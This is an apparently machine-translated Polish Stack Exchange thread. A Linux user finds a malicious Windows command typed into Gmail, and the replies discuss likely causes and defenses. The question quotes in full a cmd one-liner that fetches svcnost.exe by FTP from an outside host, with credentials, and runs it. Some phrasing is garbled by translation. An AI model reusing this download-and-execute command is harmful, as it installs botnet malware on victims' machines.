Jak ustalić, czy mój komputer z Linuksem został zhakowany?

Mój domowy komputer jest zwykle włączony, ale monitor jest wyłączony. Tego wieczoru wróciłem do domu z pracy i znalazłem coś, co wygląda na próbę włamania: w mojej przeglądarce mój Gmail był otwarty (to byłem ja), ale był w trybie tworzenia z następującymi w TOpolu:

md / c echo otwórz cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe i echo wyjścia Masz własność

Dla mnie wygląda to na kod wiersza poleceń systemu Windows, a mdpoczątek kodu w połączeniu z faktem, że Gmail był w trybie tworzenia, pokazuje, że ktoś próbował uruchomić cmdpolecenie. Myślę, że miałem szczęście, że tak naprawdę nie uruchamiam Windowsa na tym komputerze, ale mam inne. To pierwszy raz, kiedy coś takiego mi się przytrafiło. Nie jestem guru Linuksa i wtedy nie korzystałem z innych programów poza Firefoksem.

Jestem absolutnie pewien, że tego nie napisałem i nikt inny nie był fizycznie przy moim komputerze. Ponadto ostatnio zmieniłem moje hasło Google (i wszystkie inne moje hasła) na coś podobnego, vMA8ogd7bvwięc nie sądzę, aby ktoś włamał się na moje konto Google.

Co się stało? Jak ktoś naciska klawisze na moim komputerze, kiedy to nie stara maszyna Windows babci od lat uruchamia złośliwe oprogramowanie, ale ostatnia nowa instalacja Ubuntu?

Aktualizacja:
Pozwól, że zajmę się niektórymi punktami i pytaniami:

• Jestem w Austrii, na wsi. Mój router WLAN obsługuje WPA2 / PSK i hasło o średniej sile, którego nie ma w słowniku; musiałby być brutalny i oddalony o mniej niż 50 metrów; jest mało prawdopodobne, że został zhakowany.
• Używam przewodowej klawiatury USB, więc ponownie bardzo mało prawdopodobne, aby ktokolwiek mógł być w zasięgu, aby ją zhakować.
• Nie korzystałem wtedy z komputera; po prostu byłem bezczynny w domu, kiedy byłem w pracy. To komputer stacjonarny z monitorem, więc rzadko go wyłączam.
• Maszyna ma tylko dwa miesiące, działa tylko na Ubuntu i nie używam dziwnego oprogramowania ani nie odwiedzam dziwnych stron. To głównie Stack Exchange, Gmail i gazety. Brak gier. Ubuntu jest na bieżąco.
• Nie znam żadnej działającej usługi VNC; Na pewno nie zainstalowałem ani nie włączyłem. Nie uruchomiłem także żadnych innych serwerów. Nie jestem pewien, czy jakieś są domyślnie uruchomione w Ubuntu?
• Znam wszystkie adresy IP związane z aktywnością konta Gmail. Jestem całkiem pewien, że Google nie był wejściem.
• Znalazłem Przeglądarkę plików dziennika , ale nie wiem, czego szukać. Wsparcie?

To, co naprawdę chcę wiedzieć, i co naprawdę sprawia, że ​​czuję się niebezpiecznie, to: w jaki sposób każdy z Internetu może generować naciśnięcia klawiszy na moim komputerze? Jak mogę temu zapobiec, nie będąc w tym wszystkim cynobrowym kapeluszem? Nie jestem maniakiem Linuksa, jestem ojcem, który ma problemy z Windows od ponad 20 lat i mam tego dość. Przez ponad 18 lat bycia online nigdy osobiście nie widziałem żadnej próby włamania, więc jest to dla mnie nowość.

Wątpię, żebyś miał się czym martwić. To był bardziej niż prawdopodobnie atak JavaScript, który próbował wykonać dysk przez pobranie . Jeśli martwi Cię to, zacznij korzystać z dodatków NoScript i AdBlock Plus Firefox.

Nawet odwiedzając wiarygodne strony, nie jesteś bezpieczny, ponieważ uruchamiają kod JavaScript od zewnętrznych reklamodawców, którzy mogą być złośliwi.

Złapałem go i uruchomiłem na maszynie wirtualnej. Zainstalował mirc i jest to dziennik stanu ... http://pastebin.com/Mn85akMk

Jest to zautomatyzowany atak, który próbuje zmusić cię do pobrania mIRC i dołączenia do botnetu, który zmieni cię w spambota ... Miał moją maszynę wirtualną, która dołączyła do wielu różnych zdalnych adresów, z których jednym jest autoemail-119.west320.com.

Uruchamiając go w systemie Windows 7 musiałem zaakceptować monit UAC i zezwolić na dostęp przez zaporę.

Wydaje się, że na innych forach jest mnóstwo raportów o tym dokładnym poleceniu, a ktoś nawet mówi, że plik torrent próbował go wykonać po zakończeniu pobierania ... Nie jestem jednak pewien, jak to byłoby możliwe.

Nie korzystałem z tego osobiście, ale powinien być w stanie pokazać bieżące połączenia sieciowe, abyś mógł sprawdzić, czy jesteś podłączony do czegoś nienormalnego: http://netactview.sourceforge.net/download.html

Zgadzam się z @ jb48394, że to prawdopodobnie exploit JavaScript, podobnie jak wszystko inne w dzisiejszych czasach.

Fakt, że próbował otworzyć cmdokno (patrz komentarz @ torbengb ) i uruchomić złośliwe polecenie, a nie tylko dyskretnie pobierać trojana w tle, sugeruje, że wykorzystuje on pewną lukę w Firefoksie, która umożliwia mu wprowadzanie naciśnięć klawiszy, ale nie uruchamiać kodu.

To również wyjaśnia, dlaczego to wyczyn, który był wyraźnie napisane wyłącznie dla systemu Windows, będzie również pracować w systemie Linux: Firefox uruchamia kodu JavaScript w ten sam sposób we wszystkich OS'es (przynajmniej próbuje :)) . Gdyby było to spowodowane przepełnieniem bufora lub podobnym exploitem przeznaczonym dla systemu Windows, spowodowałoby to awarię programu.

Jeśli chodzi o to, skąd pochodzi kod JavaScript - prawdopodobnie złośliwa reklama Google (reklamy wyświetlają się w Gmailu przez cały dzień) . To nie będzie pierwszy raz .

Znalazłem podobny atak na inną maszynę z systemem Linux. Wygląda na to, że jest to rodzaj polecenia FTP dla systemu Windows.

To nie odpowiada na całe pytanie, ale w pliku dziennika poszukaj nieudanych prób logowania.

Jeśli w twoim dzienniku jest więcej niż pięć nieudanych prób, ktoś próbował złamać root. Jeśli próba zalogowania się zakończy się powodzeniem, rootgdy nie ma Cię przy komputerze, NATYCHMIAST ZMIEŃ HASŁO !! Mam na myśli PRAWO TERAZ! Najlepiej niż coś alfanumerycznego i około 10 znaków.

Z otrzymanymi wiadomościami ( echopolecenia) to naprawdę brzmi jak jakiś niedojrzały dzieciak . Gdyby to był prawdziwy haker, który wiedziałby, co robi, prawdopodobnie nadal nie wiedziałbyś o tym.

whois raporty west320.com jest własnością Microsoft.

UPnP i Vino (System -> Preferencje -> Pulpit zdalny) w połączeniu ze słabym hasłem Ubuntu?

Czy korzystałeś z niestandardowych repozytoriów?

DEF CON co roku organizuje konkurs Wi-Fi na odległość, do której można dotrzeć do punktu dostępu Wi-Fi - ostatnio słyszałem, że było to 250 mil.

Jeśli naprawdę chcesz się bać, spójrz na zrzuty ekranu centrum dowodzenia botnetu Zeus . Żadna maszyna nie jest bezpieczna, ale Firefox w systemie Linux jest bezpieczniejszy niż reszta. Jeszcze lepiej, jeśli uruchomisz SELinux .